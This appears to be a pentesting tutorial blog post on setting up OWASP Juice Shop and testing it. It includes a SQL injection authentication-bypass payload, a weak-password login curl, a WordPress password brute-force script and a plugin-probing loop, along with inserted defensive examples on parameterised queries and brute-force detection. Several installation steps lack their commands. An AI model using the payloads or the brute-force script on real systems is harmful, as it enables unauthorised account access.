Uncategorized · 05/04/2026 · 6 min read

Mastering Pentesting with Juice Shop – Comprehensive Course

Pablo Rotem · 0 comments


# Kali Linux Juice Shop Pentest Course – Section 5/5: Mastering Pentesting with Juice Shop

## Introduction

In this final section of the Kali Linux Juice Shop Pentest Course, we will explore the installation and configuration of the Juice Shop application on Kali Linux, delve into its usage through practical, step-by-step examples, and examine real-world use cases of web application penetration testing. This course will provide you with the necessary skills to identify vulnerabilities in web applications using Juice Shop, equipping you with both theoretical knowledge and hands-on experience.

## 1. Installation and Configuration on Kali Linux

### 1.1 Prerequisites

Before you begin, ensure you have the following:

- A running instance of Kali Linux (preferably the latest version)
- Basic understanding of terminal commands and web application security concepts

### 1.2 Installing Node.js and npm

To run Juice Shop, you must have Node.js and npm (Node Package Manager) installed on your Kali system. Follow these steps:

1. **Open the terminal.**
2. **Update your package manager:**
3. **Install Node.js and npm:**
4. **Verify the installation:**

### 1.3 Downloading Juice Shop

You can download Juice Shop from its GitHub repository. Use the following commands:

1. **Clone the repository:**

   ```bash
   git clone https://github.com/OWASP/juice-shop.git
   ```

2. **Navigate to the Juice Shop directory:**

### 1.4 Installing Dependencies

After downloading the Juice Shop application, install its dependencies using npm:

### 1.5 Starting the Application

Once the dependencies are installed, you can start Juice Shop with the following command:

By default, the application will be available at `http://localhost:3000`.

### 1.6 Accessing Juice Shop

Open your web browser and navigate to `http://localhost:3000`. You should see the Juice Shop user interface, confirming that the application is up and running.

## 2. Step-by-Step Usage and Real-World Use Cases

In this section, we will explore how to use Juice Shop for penetration testing and various scenarios you might encounter.

### 2.1 Understanding the Application Structure

Juice Shop is designed to be a deliberately insecure web application. The key areas to focus on include:

- **Authentication**: User login and registration functionalities
- **Product Listings**: Browsing and adding products to the cart
- **Admin Interface**: Accessing administrative functionalities
- **API Endpoints**: Interacting with the backend through RESTful APIs

### 2.2 Conducting a Basic Penetration Test

**Step 1: Reconnaissance**

Find out the version of the Juice Shop application and its dependencies by inspecting the response headers and the application's responses.

```bash
# Use curl to inspect the headers
curl -I http://localhost:3000
```

**Step 2: Scanning for Vulnerabilities**

Use tools like OWASP ZAP or Burp Suite to scan for common vulnerabilities. You can configure ZAP to intercept requests between your browser and Juice Shop.

```bash
# Start ZAP
zap.sh
```

**Step 3: Manual Testing**

Check for common vulnerabilities such as:

- **SQL Injection**: Attempt to manipulate input fields in the login area.
- **Cross-Site Scripting (XSS)**: Insert malicious scripts into input fields and observe if they are executed.
For instance, in the login form, enter a test payload in the email field and observe whether it is rendered as markup instead of being displayed as plain text.

### 2.3 Exploiting Known Vulnerabilities

Juice Shop contains several known vulnerabilities for educational purposes. Familiarize yourself with these:

1. **Broken Authentication**: Test the login functionality with weak passwords.
2. **Sensitive Data Exposure**: Check if any sensitive information is being sent without encryption.

For example, you can use the following curl command to log in with a weak password:

```bash
curl -X POST -H "Content-Type: application/json" \
  -d '{"email":"[email protected]","password":"admin"}' \
  http://localhost:3000/Users/login
```
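Step 3 above lists SQL injection against the login form, and section 2.4 below gives the `' OR '1'='1'; --` payload. The following added example (mine, not code from the course or from the Juice Shop project) shows, against an in-memory SQLite database with constructed users, why that payload logs in as the first stored user when the query is assembled from strings, and why the same payload simply fails against a parameterised query. The table layout, the sample accounts and the `login_vulnerable`/`login_safe` functions are assumptions made for this illustration, not Juice Shop's real schema or endpoint.

```python
"""Added example, not part of the original course: why the payload from section
2.4 bypasses a login query that is assembled from user input, and why a
parameterised query is not affected.  Runs against an in-memory SQLite database
with constructed sample users; the table layout is an assumption for this
example, not Juice Shop's real schema or endpoint."""
import sqlite3

# The payload quoted in section 2.4 of the course.
SQLI_PAYLOAD = "' OR '1'='1'; --"


def make_db():
    """Constructed sample data.  Passwords are stored in clear text only to keep
    the example short; a real application stores password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (email, password, role) VALUES (?, ?, ?)",
        [
            ("admin@example.test", "admin", "admin"),
            ("bob@example.test", "correct horse battery staple", "customer"),
        ],
    )
    return conn


def build_vulnerable_query(email, password):
    """The defect: user input is pasted into the SQL text, so a quote in the
    input changes the structure of the query instead of staying data.  With the
    payload as email the WHERE clause becomes `email = '' OR '1'='1'` and the
    `--` comments out the password check."""
    return (
        "SELECT email, role FROM users "
        "WHERE email = '" + email + "' AND password = '" + password + "'"
    )


def login_vulnerable(conn, email, password):
    """Returns (email, role) of the first matching user, or None."""
    return conn.execute(build_vulnerable_query(email, password)).fetchone()


def login_safe(conn, email, password):
    """Same lookup with bound parameters: the driver passes the input as values,
    so the payload is just a non-matching email string."""
    return conn.execute(
        "SELECT email, role FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("Query actually executed by the vulnerable login:")
    print("  " + build_vulnerable_query(SQLI_PAYLOAD, "wrong"))
    print("vulnerable login with payload     ->", login_vulnerable(db, SQLI_PAYLOAD, "wrong"))
    print("parameterised login with payload  ->", login_safe(db, SQLI_PAYLOAD, "wrong"))
    print("parameterised login, real password ->", login_safe(db, "admin@example.test", "admin"))
```

Run it directly to see the query text the vulnerable function actually executes. The fix in `login_safe` is the standard one: bound parameters, so the database driver never interprets user input as SQL, which is the separation of code and data that the OWASP SQL Injection page linked in section 3.1 describes.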
### 2.4 Real-World Scenario: Testing for SQL Injection

1. **Identify Input Vulnerabilities**: Look for input fields that interact with the database, such as search or login forms.
2. **Inject Malicious SQL Code**: For example, in the login form, try:

   ```sql
   ' OR '1'='1'; --
   ```

   This SQL payload attempts to bypass authentication: the `OR '1'='1'` makes the `WHERE` condition always true, and the `--` comments out the remainder of the query, including the password check.

## 3. Detailed Technical Explanations and External Reference Links

### 3.1 Understanding SQL Injection

SQL Injection (SQLi) vulnerabilities occur when an application builds SQL queries from user input without keeping that input separate from the query's own code. For an in-depth understanding, refer to the OWASP SQL Injection documentation: [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)

### 3.2 XSS Vulnerabilities

Cross-Site Scripting (XSS) can lead to session hijacking and data theft. For further reading, check the OWASP XSS page: [OWASP XSS](https://owasp.org/www-community/attacks/xss/)

## 4. Code Examples for WordPress Penetration Testing

While the focus is on Juice Shop, understanding WordPress weaknesses can enhance your skill set as a pentester. Here are some basic code snippets to test a WordPress site for vulnerabilities:

### 4.1 Testing for Admin Access

To gain access to the WordPress admin panel, try to guess the password using a simple brute-force script:

```python
import requests

# Login form of the site under test and the account and candidate passwords to try.
url = "http://yourwordpresssite.com/wp-login.php"
username = "admin"
passwords = ["password123", "123456", "letmein"]

for password in passwords:
    # WordPress expects the credentials in the 'log' and 'pwd' form fields.
    response = requests.post(url, data={'log': username, 'pwd': password})
    # A successful login renders the admin dashboard.
    if "Dashboard" in response.text:
        print(f"Found password: {password}")
        break
```

### 4.2 Checking for Vulnerable Plugins

Many WordPress plugins can have vulnerabilities. Run this Bash script to check for known vulnerable plugins:

```bash
#!/bin/bash
plugins=("wp-file-manager" "wp-statistics" "revslider")
for plugin in "${plugins[@]}"
do
  echo "Checking for $plugin vulnerability..."
  # A command that checks if the plugin is installed or outdated
  curl -s "http://yourwordpresssite.com/wp-content/plugins/$plugin/" | grep "plugin-version-indicator"
done
```
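The script in section 4.1 keeps submitting passwords until the dashboard appears, and the curl command in section 2.3 tries a single weak password; on the server both show up as failed logins from one source, in the 4.1 case a burst of failures followed by a success. The following added example (mine, not code from the course or from WordPress or Juice Shop) implements that detection over a constructed login log. The log format, the sample lines, the source addresses and the window and threshold values are all constructed or assumed here and would be adapted to the real web-server or application log.

```python
"""Added example, not part of the original course: spotting password guessing of
the kind the section 4.1 script performs, from the defender's side.  The log
format, the sample lines and the thresholds are all constructed or assumed for
this example."""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample login events:
# "<timestamp> login src=<ip> user=<name> result=<ok|fail>"
SAMPLE_LOG = """\
2026-04-05T10:00:01Z login src=203.0.113.7 user=admin result=fail
2026-04-05T10:00:02Z login src=203.0.113.7 user=admin result=fail
2026-04-05T10:00:03Z login src=203.0.113.7 user=admin result=fail
2026-04-05T10:00:04Z login src=203.0.113.7 user=admin result=ok
2026-04-05T10:00:30Z login src=198.51.100.4 user=alice result=fail
2026-04-05T10:05:00Z login src=198.51.100.4 user=alice result=ok
"""


def parse_line(line):
    """Parse one constructed log line into a dict with a timezone-aware timestamp."""
    ts_text, _event, rest = line.split(" ", 2)
    fields = dict(item.split("=", 1) for item in rest.split())
    ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {
        "ts": ts,
        "src": fields["src"],
        "user": fields["user"],
        "ok": fields["result"] == "ok",
    }


def detect_password_guessing(log_text, window_seconds=60, threshold=3):
    """Flag sources with `threshold` or more failed logins inside a sliding
    window of `window_seconds` (both values are assumptions to tune per site).

    A successful login while the source is still over the threshold is recorded
    as `success_after_burst`: that is the moment a guessing script such as the
    one in section 4.1 stops, and the account should then be treated as
    compromised rather than merely attacked."""
    events = sorted(
        (parse_line(line) for line in log_text.splitlines() if line.strip()),
        key=lambda e: e["ts"],
    )
    recent_failures = defaultdict(list)  # src -> timestamps of failures still in the window
    alerts = {}
    for ev in events:
        fails = recent_failures[ev["src"]]
        cutoff = ev["ts"] - timedelta(seconds=window_seconds)
        fails[:] = [t for t in fails if t >= cutoff]  # drop failures that fell out of the window
        if not ev["ok"]:
            fails.append(ev["ts"])
        if len(fails) >= threshold:
            alert = alerts.setdefault(
                ev["src"], {"failures": 0, "users": set(), "success_after_burst": False}
            )
            alert["failures"] = max(alert["failures"], len(fails))
            alert["users"].add(ev["user"])
            if ev["ok"]:
                alert["success_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for src, alert in detect_password_guessing(SAMPLE_LOG).items():
        print(src, alert)
```

With the sample log only `203.0.113.7` is flagged, with three failures and a success inside the window; `198.51.100.4` is not, because its single failure and later success are five minutes apart. The detection pairs with the preventive control on the application side, rate limiting or a temporary lockout after repeated failures, which is what makes both the 2.3 weak-password test and a 4.1-style loop stop producing results.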
## Conclusion

In this comprehensive course on mastering pentesting with Juice Shop, you have learned how to install and configure Juice Shop on Kali Linux, use it for penetration testing, and explore various vulnerabilities. By applying these techniques, you can undertake real-world web application security assessments and enhance your skills as a white-hat hacker. For continuous learning, stay updated with the OWASP guidelines and contributions to the security community.

To ensure a thorough understanding, practice these techniques on your local Juice Shop instance safely. The hands-on experience will be invaluable in your journey as a penetration tester.

— Made by pablo rotem / פבלו רותם